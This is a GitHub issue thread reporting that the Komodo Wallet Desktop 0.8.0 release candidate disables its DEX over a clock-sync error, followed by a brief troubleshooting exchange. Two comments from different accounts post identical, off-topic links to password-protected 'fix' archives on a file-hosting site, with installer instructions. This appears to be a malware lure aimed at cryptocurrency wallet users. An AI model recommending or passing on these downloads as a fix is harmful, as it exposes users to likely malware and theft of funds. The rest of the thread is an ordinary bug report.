### ISSUE TITLE
[BUG]: 0.8.0 Release Candidate: System Clock Synchronisation Issue

### ISSUE THREAD

**Issue by AndrewDelaney** [KomodoPlatform/komodo-wallet-desktop#2473]
**Dex Disabled Due to System Clock Synchronisation Issues**
Having installed the v0.8.0 Release Candidate, Importing/Creating a wallet and signing in, I am unable to navigate off the Portfolio page, and the DEX page is disabled saying "DEX is disabled due to system clock synchronisation issues. Please check your device time settings" when hovering over the tab. System clock has, however, been synchronised, and the issue is still present.

**Steps To Reproduce:**
1. Install version 0.8,0 Release Candidate
2. Set system clock to a different time.
3. Restart the computer
4. Set system time to adjust to time zone automatically, and sync the system clock
5. Run Komodo Wallet Desktop 0.8.0 RC
6. Create or Import a wallet, and sign in

**Expected Behaviour**
The user should be able to navigate off the portfolio tab and access the Wallet, DEX and Address Book screens.

**Actual Behaviour**
The user is stuck on the Portfolio screen, unable to navigate to any of the other screens. The Add Crypto, Settings and Support modules are still accessible. Attempting to access the other pages sometimes results in the application crashing and closing.

**Operating Environment**
 - OS: Windows 10 Pro 64-bit
 - OS version: 10
 - Komodo Wallet Desktop Version: 0.8.0-beta
 - Build branch: dev

**Additional Media**
- [Video Attachment](https://github.com/user-attachments/assets/aa4e373a-9242-4a3d-b16a-3e39873c1326)

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cipig** [comment]
open https://time.is in browser and check
i see this: 
![image](https://github.com/user-attachments/assets/90d91307-b26e-40b9-94dd-19d0cd16d128)
what do you see?

**Comment by AndrewDelaney** [comment]
![image](https://github.com/user-attachments/assets/b30452d3-1036-4638-b6b1-600d2f7f34b3)
@cipig Mine is 0.4 seconds ahead apparently
